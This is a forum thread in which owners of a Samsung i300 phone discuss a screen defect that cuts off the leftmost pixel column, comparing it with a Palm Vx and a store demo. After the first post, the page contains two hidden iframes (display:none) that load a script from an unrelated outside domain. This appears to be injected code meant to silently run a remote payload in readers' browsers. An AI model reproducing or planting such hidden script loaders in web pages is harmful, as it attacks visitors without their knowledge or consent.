+ Reply to Thread

Thread: Screen Question

Question Screen Question

Depending on the application, I am losing the first column of pixels on the screen, such that all the first letters on a row get chopped in half. Is everyone else experiencing this?

Thanks,

Rob<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Screen Question

Originally posted by Lupin
    Depending on the application, I am losing the first column of pixels on the screen, such that all the first letters on a row get chopped in half. Is everyone else experiencing this?

Thanks,

Rob
    Name an application or two that exhibits this so that we can check.

Applications that exhibit this problem

The Blazer Browser, for one...

Also, when I Hotsync the phone, the first half of the H on Hotsync gets cut off (not from the blue tab, but under, where it tells you that it just completed the function).

Rob

Called Samsung

I spoke to a level 2 rep at Samsung who recommended that I replace my I300... according to him, I have a bad LCD... Well, I will be waiting until I get the new phone before I send this one back....

I noticed that the text in most my applications is pushed all the way left.... so that there is not a blank column of pixels before the text starts.... looks a little weird...

is this normal?
    Attached Thumbnails Attached Thumbnails Screen Question-i300pixels.jpg  

Originally posted by fikse
    I noticed that the text in most my applications is pushed all the way left.... so that there is not a blank column of pixels before the text starts.... looks a little weird...

is this normal?
    Mine does the same. I checked a Palm Vx and it does it too. I think what you are seeing is that with the Palm Vx there is a small space between the edge pixel and the edge of the screen, and with the i300 there is no space.

On mine, I am actually losing the left side of the H completely.

Rob

I have the same problem--losing the pixels down the left side of the screen. Sort of like the screen was assembled too far to the left.

I would agree with richard. I had a Palm Vx which was fine. I then had to replace it, and the text was all the way over, in fact I could not pick to the left of characters. It was a pain. Can you guys still pick to the left?

Screen Issue

I am waiting on a new phone from Sprint that will let me know if this is something in all of these phones or just on mine.

Confirmed today

I went to the Best Buy near me, and they had a demo. I checked it compared to my phone, and sure enough, my screen actually had a problem.

Rob